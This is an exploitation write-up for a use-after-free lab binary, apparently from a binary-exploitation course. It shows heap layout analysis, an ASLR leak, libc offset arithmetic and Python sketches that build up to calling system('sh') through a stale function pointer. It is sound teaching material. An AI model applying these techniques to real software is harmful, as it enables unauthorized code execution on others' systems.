The target app

This time we are dealing with a very plain and simple UaF vulnerability. The source code can be found here:

Right away we can see two data structure definitions, which more or less suggest what we are going to be dealing with (structures holding some data along with function pointers):

While the menu clearly shows what operations are available:

After creating instances of the structures, we'll be able to call their dedicated print functions, pointed to by the (* print) pointers.

If you are familiar with Use after Free, you already know what it will all boil down to. We allocate space for one of the structures, fill it with arbitrary data wherever we can control it, and ask the program to remove it. Then we allocate an instance of the other structure in the space previously taken by the first one. Finally, we abuse the old pointer still tracking the first structure to perform its structure-specific operation, making a function call to an arbitrary address we smuggled inside the data of the second structure.

How data is aligned in memory

So, to find out which fields of the number and data structures overlap with each other, and therefore to decide on the exploitation sequence, we first need to know exactly how the data is aligned in memory.

We already know that the number structure is 16 bytes long, while the data structure is 32. So we would expect to have to use two number structures to fill the space previously taken by one data instance.

So I ran gdb, only to find out I was wrong. I allocated three numbers in a row, then took the current heap start address from the vmmap output (it is important to do this AFTER the first allocation; otherwise you won't even see the [heap] section in the vmmap output, because the OS has not allocated it yet) and had a look. Then I restarted the program and did the same with the data structure. The results are illustrated by the screenshot below:

Comparison of the view of the heap after allocating three number structures versus three data structures

As we can see, both structures take 32 bytes (the 16-byte structure is automatically padded to 32 bytes). This is very convenient for us, as we won't have to struggle with aligning different numbers of instances against each other to achieve a favorable alignment that allows us to do something neat.

Combining mutually-overlapping fields of both structures to find the proper codexec UaF scenario

So, since I already started with the visualization thing to clearly see the memory layout, I decided to take further advantage of it to compare what fields in one structure correspond to what fields in the other.

On the upper part of the screenshot (number) function pointers were marked red, actual numbers were marked green. On the lower side of the screenshot (data) function pointers were marked green, last four bytes of the string were marked red:

Looking at this for just a few seconds made it clear to me how to achieve execution control.

We can see that in the number structure, the function pointer (0xb770ccb4 on the screenshot above) occupies the same space that, when allocated with a string, always contains at least one null byte (0x00414141 on the screenshot above). This is because the string is automatically null-terminated by fgets() and we can't control that.

Hence, allocating a number, deleting it, allocating a string in its place and then requesting the program to print the number won't get us far: the program will call 0x00ANYTHING and crash. We only control up to three bytes of that value, and a partial overwrite won't help us either, because fgets() will always put a null byte exactly where we want something arbitrary (the most significant byte of the address).

At the same time we can see that the space holding the actual number value (0x41414141 on the screenshot above), which we can control fully (as numbers from all ranges are acceptable), sits in the same place as the function pointer of the string structure (0xb774dc16 on the screenshot above). Hence, allocating a string, deleting it, creating an arbitrary number and then requesting the string to be printed would effectively lead to the program trying to print the already freed string with the code pointed to by our newly created number, still treating it as a pointer to the data->print function (big_str/small_str).
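The overlap can also be checked mechanically. Below is a minimal sketch, assuming field layouts reconstructed from the heap view described above: offsets are relative to the start of the 32-byte structure (the heap offsets minus an assumed 8-byte chunk header), and the field names and sizes are assumptions rather than a copy of the target's source.

```python
# Field layouts as (name, offset, size) inside the 32-byte allocation.
# ASSUMPTION: reconstructed from the heap offsets discussed in the text.
NUMBER_FIELDS = [("reserved", 0, 24), ("print", 24, 4), ("num", 28, 4)]
DATA_FIELDS = [("leading", 0, 8), ("buff", 8, 20), ("print", 28, 4)]


def overlaps(fields_a, fields_b):
    """Return (name_a, name_b, start, end) for every pair of fields sharing bytes."""
    shared = []
    for name_a, off_a, size_a in fields_a:
        for name_b, off_b, size_b in fields_b:
            start = max(off_a, off_b)
            end = min(off_a + size_a, off_b + size_b)
            if start < end:
                shared.append((name_a, name_b, start, end))
    return shared


for name_a, name_b, start, end in overlaps(NUMBER_FIELDS, DATA_FIELDS):
    print(f"number.{name_a} overlaps data.{name_b} at bytes {start}..{end}")
```

Under these assumptions, number.num shares its four bytes with data.print, while number.print shares its bytes with the tail of data.buff, which matches the two observations above.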

Let's try it.

We add a string (its contents are irrelevant, we are only interested in having data structure's print function pointer propagated onto the heap):

Now we remove it:

OK. Now we are going to introduce the address we will trick the target program into calling (in our final exploit this will be the address of system()). Let's say we want the program to crash by calling address 0x31337157 (because it's not a valid address in its address space).

Calculating the decimal format:

$ printf "%d" 0x31337157
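The same conversion can be sketched in Python, which is handy once the address comes from a script rather than from the shell. The helper name to_decimal is hypothetical.

```python
def to_decimal(address_hex):
    """Convert a hex address string into the decimal text typed into the number prompt."""
    return str(int(address_hex, 16))


print(to_decimal("0x31337157"))  # 825454935
```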


Now, asking the program to print the string 1 should lead to a segfault at 0x31337157:

Yup. And the string itself will be useful to us to control the arguments (so we'll put system()'s address instead of 0x31337157 and "sh" as the string, leading to system("sh")).

If we look at the corresponding fields in the heap layout, we'll see that the first 16 bytes of the string buffer overlap the reserved fields of the number structure. This means that if we allocate a number after removing a string, reusing the space the string was allocated in, those first 16 bytes will be left alone and keep the old values from the string.

So calling system("sh") should be doable:

  1. create a string "sh"
  2. delete the string
  3. create a number == libc system()'s address
  4. 'print' the string
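The four steps can be modeled offline with the struct module. This is only a sketch under stated assumptions: the layouts are reconstructed from the heap view (not copied from the source), free() is modeled as leaving the chunk contents untouched, and the default pointer values are the ones visible in the screenshots above.

```python
import struct

DATA_FMT = "<8s20sI"  # ASSUMED data layout: 8 leading bytes, buff[20], print pointer
NUM_TAIL_FMT = "<II"  # ASSUMED tail of the number layout: print pointer, num
NUM_TAIL_OFF = 24     # the number's reserved bytes before this offset are never written


def simulate_codexec(string, number, str_print=0xB774DC16, num_print=0xB770CCB4):
    """Model the chunk reuse and return (address called, argument string)."""
    chunk = bytearray(32)
    # 1. create the string
    struct.pack_into(DATA_FMT, chunk, 0, b"", string, str_print)
    # 2. delete the string: modeled as a no-op, the stale pointer keeps pointing here
    # 3. create the number in the same chunk
    struct.pack_into(NUM_TAIL_FMT, chunk, NUM_TAIL_OFF, num_print, number)
    # 4. 'print' the string through the stale pointer
    _, buff, print_ptr = struct.unpack_from(DATA_FMT, chunk, 0)
    return print_ptr, buff.split(b"\x00", 1)[0]


target, argument = simulate_codexec(b"sh", 0x31337157)
print(hex(target), argument)
```

In this model the string's print pointer is replaced by the number we supplied, while the "sh" argument survives because the number structure never touches the first 16 bytes of the buffer.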

The only problem we have got left to figure out is how to leak the memory layout to bypass ASLR.

Combining mutually-overlapping fields of both structures to find the proper UaF leak scenario

Looking at the layout again brought me the potential answer to this literally at first glance (which proves how crucial it is to literally see the layout).

As we want to leak memory, we need to call a function taking an argument that happens to be/store a pointer.

The goal is to see both possible states of the memory combined and find such a combination of values that will let us achieve our goal. Let's look at the layout again, this time focusing on two particular neighboring double word values we would like to have in one state - and then think if we can groom the memory into that state:

When the space is occupied by a number structure, the +0x20 address contains a pointer (the print function, marked green), while +0x24 contains data (the number, in this case 0x41414141 - but that's irrelevant to our goal, thus marked grey).

Conversely, when the space is occupied by a data structure, the +0x20 address contains data (the last three bytes of the string and its terminating null byte - useless to us, hence marked grey), while +0x24 contains a pointer (the print function, marked red).

We want to trick the program into creating that state, so we can call the big_num/small_num number-printing function with the address of the string-printing function sitting in the space previously occupied by an irrelevant number, before it was free()'d and then allocated again (but not entirely overwritten!) for the string structure.

So, we create a number, then we remove it (number[index] is still not 0, even though the structure it points to was 'removed', which means free()'d).

Then we create a relatively short (less than 15-character) string, to keep fgets() from overwriting the last four bytes of buff[20]. That is where the old number's print pointer is held, and we want to call it so that it prints out the address of the string-printing function for us, leaking the memory layout information needed to calculate system()'s address.
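The effect of the string length can be modeled the same way. The sketch below assumes the layouts reconstructed from the heap view, an fgets()-style write that stores at most 19 characters plus a terminating null byte, and free() leaving the chunk contents in place; the default pointer values are the ones from the gdb session in this section.

```python
import struct

NUMBER_FMT = "<24sII"        # ASSUMED number layout: reserved bytes, print pointer, num
BUFF_OFF, BUFF_LEN = 8, 20   # ASSUMED position and size of buff inside the data structure
DATA_PRINT_OFF = 28          # ASSUMED offset of the data structure's print pointer


def simulate_leak(string, num_print=0xB779DC65, str_print=0xB779DBC7):
    """Model number -> free -> string -> print number; return (called, argument)."""
    chunk = bytearray(32)
    struct.pack_into("<II", chunk, 24, num_print, 0x41414141)  # create the number
    # remove the number: modeled as a no-op, contents stay in place
    written = string[:BUFF_LEN - 1] + b"\x00"                  # fgets-style write
    chunk[BUFF_OFF:BUFF_OFF + len(written)] = written          # create the string
    struct.pack_into("<I", chunk, DATA_PRINT_OFF, str_print)
    _, called, argument = struct.unpack_from(NUMBER_FMT, chunk, 0)
    return called, argument


print([hex(v) for v in simulate_leak(b"A" * 14)])  # short string: pointer survives
print([hex(v) for v in simulate_leak(b"A" * 19)])  # long string: pointer clobbered
```

With a short string the number's print pointer is intact and its argument is the string-printing function's address; with a full-length string the pointer degrades to 0x00414141, the crash case described earlier.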

Let's try this in slow motion, using a breakpoint in the main loop: b *(main+169).

First, we allocate a number (1):

Now, this is the heap:

Now, we remove the number:

And again, this is the heap (yes, everything is still there after free()):

Now, we create a short string (less than 15 characters, as explained above):

Now, this is the heap:

Now, requesting the program to print the number[1] will make it call 0xb779dc65 (big_num) with 0xb779dbc7 as argument, so we have our leak:

So, we have a number vomited out. Let's convert it to a format more readable to us (hex):
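A minimal Python sketch of that conversion is shown below. The helper name is hypothetical, and masking to 32 bits is a precaution that assumes a 32-bit target: it gives the same result whether the program printed the value as signed or unsigned.

```python
def leaked_to_hex(printed):
    """Turn the decimal text printed by the program into a 32-bit hex address."""
    return hex(int(printed) & 0xFFFFFFFF)


printed = str(0xB779DBC7)  # stand-in for the decimal text printed by the program
print(leaked_to_hex(printed))
```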

Looks good. Let's confirm in gdb:

Confirming that the leaked address is the address of the small_str() function

Awesome. It looks like we have all the bits and pieces to develop an exploit! :D

Calculating system()'s address

This time I decided to skip leaking the contents of printf()'s GOT entry to calculate system()'s address (as I did previously).

Instead, I decided to find out whether libc's system() address could be calculated based only on the leaked base of the target program's code segment - and it turned out it can! At least on the VM provided for MBE.

Either way, first let's have a look around, just as if we were about to leak the GOT anyway:

Here are, respectively, our code, rodata and data segments (again, forming a contiguous space with fixed offsets from each other):

OK, now we search these ranges for the 0xb7622280 value (the address of printf()) as we know it has to be stored in GOT after the first printf() call:

This time (as opposed to what we had previously), our entry is at offset 0xfa4 in the rodata (read-only data) segment, which at the time of taking the screenshot above was at base 0xb77b4000. This is most likely the result of the -z relro gcc compilation flag:

That's OK, this is a countermeasure against GOT overwrites, we don't care about it this time at all.

If we were doing this the usual way, we would leak the code base first. From it we would calculate the rodata address, and from that the address of printf()'s GOT entry, so we could leak printf()'s address from it. Then, based on its fixed offset from system() within libc itself, we would calculate system()'s address. Then get a shell.

But let's try a more direct approach and run the program a few times, observing the vmmap output and focusing on the relation between the target app's code segment base (which we can already leak) and the libc base (which we want to know as well):

Another run:

Yup, in both cases the offsets are the same:

Hence, one leak is enough here (which would not be the case for the stack or the heap, but we don't care about those here).

So, once we subtract 0x1dd000 from the leaked target app code base, we have the libc code base.

Now we want to know system()'s offset within the libc itself (as opposed to calculating the difference from the relative printf() offset):

The required calculations can be done with the Python code below:

Python offset calculation
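A minimal sketch of such a calculation follows. It assumes the leaked function lies within the first page of the code segment (so masking off the low 12 bits yields the code base) and uses the 0x1dd000 distance observed above; the system() offset passed in the example is a hypothetical placeholder that has to be read from the libc actually present on the target.

```python
PAGE_MASK = 0xFFFFF000
CODE_TO_LIBC_DELTA = 0x1DD000  # distance between code base and libc base, from vmmap


def libc_system_address(leaked_function, system_offset):
    """Return (code_base, libc_base, system_address) derived from one leaked pointer."""
    # ASSUMPTION: the leaked function sits in the first page of the code segment
    code_base = leaked_function & PAGE_MASK
    libc_base = code_base - CODE_TO_LIBC_DELTA
    return code_base, libc_base, libc_base + system_offset


# 0x40190 is a HYPOTHETICAL placeholder offset, not a value taken from the target
code_base, libc_base, system_addr = libc_system_address(0xB779DBC7, 0x40190)
print(hex(code_base), hex(libc_base), hex(system_addr))
```

The decimal form of the resulting address is what gets entered as the number in the code execution scenario.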

With all this in place, we can already exploit the program.

Manual exploitation

This exploitation can easily be conducted by just interacting with the program in the console, choosing the proper menu options and entering simple strings and numbers:

Full python exploit (pwnlib)